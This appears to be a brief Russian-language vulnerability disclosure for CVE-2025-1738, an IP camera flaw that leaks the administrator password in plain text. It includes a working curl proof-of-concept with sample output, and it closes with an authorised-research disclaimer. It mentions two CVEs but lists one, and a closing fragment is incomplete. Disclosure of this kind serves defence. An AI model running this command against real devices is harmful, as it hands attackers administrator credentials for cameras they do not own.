
0day обнаружение CVE-2025-1738
В рамках ответственного раскрытия были назначены два официальных CVE.
| CVE | CVSS v3.1 | Оценка | CWE | Тип |
|---|---|---|---|---|
| CVE-2025-1738 | AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 6.2 | CWE-598 | Раскрытие пароля в открытом виде |
Любой локальный пользователь может получить пароль администратора в открытом виде без предварительной аутентификации.
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp
...password=unguessable123!...
Пароль администратора возвращается в открытом виде в теле ответа.
activex_pal.asp и mblogin.asp.Этот репозиторий предназначен только для образовательных целей и авторизованных исследований безопасности. Авторы не несут ответственности за любое неправомерное использование. Всегда получайте явное разрешение перед тестированием любого устройства.